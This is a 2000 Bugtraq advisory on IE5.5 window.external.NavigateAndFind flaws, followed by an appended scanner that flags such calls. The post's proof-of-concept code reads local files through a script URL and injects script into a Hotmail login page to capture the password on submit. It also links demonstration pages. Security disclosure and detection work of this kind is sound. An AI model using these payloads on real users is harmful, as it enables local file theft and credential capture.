Bugtraq mailing list archives
IE5.5 window.externalNavigateAndFind security vulnerability....
From: Alp Sinan <alp () UK2 NET>
Date: Sat, 30 Sep 2000 18:49:41 -0000
Multiple security vulnerabilities were found in the window.external.NavigateAndFind function in IE5.5. After the most recent patches are applied, the vulnerabilities seem to persist. Actually, there are no current issues discussed at the Microsoft website. Microsoft has been notified about the problem via email. Until now there has been no response. I wanted to inform security-concerned people about the problem.

Vulnerability 1: The window.external.NavigateAndFind function can access local files, provided that the local file name and path are known.

The code (the I in the script tag replaced with lowercase):

    <A href="javascr!pt:LinkClicked()">Show local file's Content</A>
    <SCRiPT>
    function LinkClicked()
    {
    b=window.open("file://C:/test.txt","local")
    setTimeout('Sniff()',1000);
    }
    function Sniff(){
    window.external.NavigateAndFind("javascript:alert(document.body.innerText);","b","local");
    }
    </SCRiPT>

Demonstration: http://www.horoznet.com/AlpSinan/navAL.htm

Vulnerability 2: The window.external.NavigateAndFind function can access other windows' DOM. Editing the opened window's content, and therefore code injection, is possible.

The code:

    <A href="javascript:LinkClicked()">Go to Hotmail </A>
    <scrIpt>
    function LinkClicked()
    {
    a=window.open("http://lc2.law5.hotmail.passport.com/cgi-bin/login","new")
    setTimeout('Spoof()',20000);// you may modify the timeout....
    }
    function Spoof(){
    window.external.NavigateAndFind("javascript:document.write(''+document.body.outerHTML+'<scrIpt>document.passwordform.onsubmit=ShowPass;function ShowPass(){alert(\"Your Password is: \n \"+document.passwordform.passwd.value)};window.focus();</sc'+'rIpt>');alert('The code has been injected right now.');","a","new");
    }
    </scrIpt>

Demonstration: http://www.horoznet.com/AlpSinan/navCI.htm

Vulnerability 3: IE5.5 can execute the plain text files' JavaScript or VBScript content.

Demonstration: http://www.horoznet.com/AlpSinan/execlocal.htm

Precautions or workarounds might be disabling JavaScript or using caution while clicking the links in untrusted webpages as well as popup windows.

Alp Sinan
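
Added example, not part of the original post and not the author's code: a heuristic scanner a content filter could run over page source to flag NavigateAndFind calls whose first argument is a script URL, the call shape both listings above rely on. The function names and the sample strings are constructed for illustration.

```javascript
// Heuristic check for the call pattern described in the advisory:
// window.external.NavigateAndFind(<script URL>, <text>, <target window>).
// Assumption: scanning raw page source; obfuscated or generated calls are only
// caught as "non-literal" and need manual review.
const SCRIPT_SCHEMES = /^\s*(javascript|vbscript)\s*:/i;

// Read a quoted JS string literal starting at src[i]; returns {value, end} or null.
function readStringLiteral(src, i) {
  const quote = src[i];
  if (quote !== '"' && quote !== "'") return null;
  let value = "";
  for (let j = i + 1; j < src.length; j++) {
    const ch = src[j];
    if (ch === "\\") { value += src[++j] ?? ""; continue; } // keep the escaped char as-is
    if (ch === quote) return { value, end: j + 1 };
    value += ch;
  }
  return null; // unterminated literal
}

function findSuspiciousNavigateAndFind(html) {
  const findings = [];
  const call = /NavigateAndFind\s*\(\s*/gi;
  let m;
  while ((m = call.exec(html)) !== null) {
    const lit = readStringLiteral(html, call.lastIndex);
    if (!lit) {
      // First argument is a variable or expression: cannot be judged statically.
      findings.push({ offset: m.index, reason: "non-literal first argument", url: null });
      continue;
    }
    // Browsers ignore tabs and line breaks inside a URL scheme, so drop them first.
    const url = lit.value.replace(/[\t\r\n]/g, "");
    if (SCRIPT_SCHEMES.test(url)) {
      findings.push({ offset: m.index, reason: "script URL passed as location", url });
    }
  }
  return findings;
}

// Constructed sample inputs (not taken from the demonstration pages).
const SAMPLE_FLAGGED = 'window.external.NavigateAndFind("javascript:void(0)","b","local");';
const SAMPLE_CLEAN = 'window.external.NavigateAndFind("http://example.com/","term","");';
const SAMPLE_DYNAMIC = 'window.external.NavigateAndFind(u,"b","local");';
```
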